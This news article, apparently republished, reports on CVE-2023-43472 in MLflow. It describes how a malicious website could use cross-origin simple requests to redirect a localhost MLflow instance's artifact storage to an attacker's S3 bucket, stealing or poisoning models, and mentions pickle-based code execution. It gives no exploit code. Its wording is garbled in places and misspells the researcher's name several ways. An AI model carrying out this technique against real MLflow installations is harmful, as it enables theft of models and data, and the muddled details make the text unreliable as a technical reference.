MLflow vulnerability enables remote machine learning model theft and poisoning.

WhatsApp Group Join Now
Telegram Group Join Now
Instagram Group Join Now

It’s been an eventful year for creative artificial intelligence (AI). The release of major language models (LLMs) has demonstrated how powerful technology can be to make business processes more efficient. Many organizations are now racing to adopt generative AI and train models on their datasets.

Developing and training AI models can be an expensive endeavor and they can easily become one of the most valuable assets a company has. It is therefore important to keep in mind that these models are susceptible to theft and other attacks, and the systems hosting them need to have strong security safeguards and policies in place.

A recent vulnerability in MLflow, an open-source machine learning lifecycle platform, highlights how sensitive training data can be exposed to attackers when a developer visits a random website on the Internet from the same machine where MLflow runs. How easy it can be to steal or poison The flaw, tracked as CVE-2023-43472, was fixed in MLflow 2.9.0.

Localhost attacks via malicious JavaScript code

Many developers believe that services bound to localhost—the computer’s internal hostname—cannot be targeted from the Internet. However, this is a false assumption, according to Joseph Beaton, a senior application security researcher at Contrast Security, who recently spoke at the DefCamp Security Conference on attacking developer environments via localhost services.

Beeton recently discovered critical vulnerabilities in the Quarkus Java Framework and MLflow that could allow remote attackers to exploit features of development interfaces or APIs natively exposed by these applications. Attacks would only require a computer user to visit a website controlled by the attacker or a legitimate site in their browser where the attacker is able to place specially crafted advertisements.

Drive-through attacks have been around for years, but they are powerful when combined with the vulnerability of cross-site request forgery (CSRF) in an application. In the past, hackers used drive-by attacks through malicious advertisements placed on websites to hijack the DNS settings of users’ home routers. In general, browsers only allow JavaScript code to make requests for resources from the same origin (domain). A special mechanism called Cross-Origin Resource Sharing (CORS) can be used to circumvent this restriction and allows scripts to make requests to different origins if specifically allowed by the target server.

For example, if domain A tries to request domain B by loading a piece of JavaScript code into the browser, the browser will first perform a so-called preflight request to check whether the domain B has a CORS policy that allows scripted requests. Domain A. While this applies to localhost as well, Batten points out that there is another type of request called a simple request that most browsers (except Safari) still allow that make a pre-flight request. doesn’t trigger because it predates CORS. Such requests are used, for example, by the HTML standard

to actually submit data through the element but can also be triggered with JavaScript.

A simple request can be of type GET, POST, and HEAD and have a content type of application/x-www-form-urlencoded, multipart/form-data, text/plain, or no content type. can However, their limitation is that creating scripts will not return a response unless the target server opts in via the Access-Control-Allow-Origin header.

From an attack perspective, though, receiving a response isn’t actually needed until the desired action initiated by the request has taken place. This is the case for both MLflow and Quarkus vulnerabilities.

Stealing and poisoning machine learning models

After MLflow is installed, its user interface is accessible by default at http://localhost:5000 and supports a REST API through which actions can be performed programmatically. Typically, API interaction will be done via POST requests with a content type of Application/JSON, which is not a permitted content type for plain requests.

However, Beeton found that MLflow’s API did not check for content-type requests, allowing requests with a text/plain content type. In turn, this allows remote cross-origin attacks through the browser via simple requests.

The API has limited functionality such as creating a new experiment or renaming an existing one, but not deleting experiments. Conveniently, in MLFlow the default experience in which new data will be stored is called “default”, so attackers can first rename it to “old” and then send a new request. can create an experiment, which will now be called “default” but with an artifact_uri pointing to an external S3 storage bucket that they control.

“Once a new MLFLow run is run — for example, mlflow run sklearn_elasticnet_wine -P alpha=0.5, experiment name default — the result of the run will be uploaded to the S3 bucket,” Beaton wrote in a blog post. I explained. This would allow an attacker to obtain the serialized version of the ML model as well as the data that was used to train it.

An attacker can take it even further. “Given that an ML model is stored in a bucket, the ML model itself would be likely to be poisoned,” the researcher said. “In such an attack, an adversary is able to inject bad data into the model’s training pool, causing it to learn something it shouldn’t.”

Remote code execution can often be achieved.

Remote code execution may also be possible if an attacker modifies the model.pkl file to inject a Python pickle exploit. Remote code execution was also a result of the Quarkus vulnerability that Beeton also found and could be exploited by simple requests from remote websites because the application’s Dev UI was bound to localhost and could be accessed cross-site. There was no additional protection for application spoofing attacks. .

“As I have shown in the meantime [the] In DefCamp terms, it’s possible to generate remote code execution (RCE) on a developer’s machine or other services on their private network,” the researcher said. “Given that developers can access codebases, AWS keys, server keys, Credentials etc. have write access, access to the developer’s machine gives an attacker a lot of scope to modify or completely change other resources on the network as well. Steal the codebase.”

WhatsApp Group Join Now
Telegram Group Join Now
Instagram Group Join Now

Leave a Comment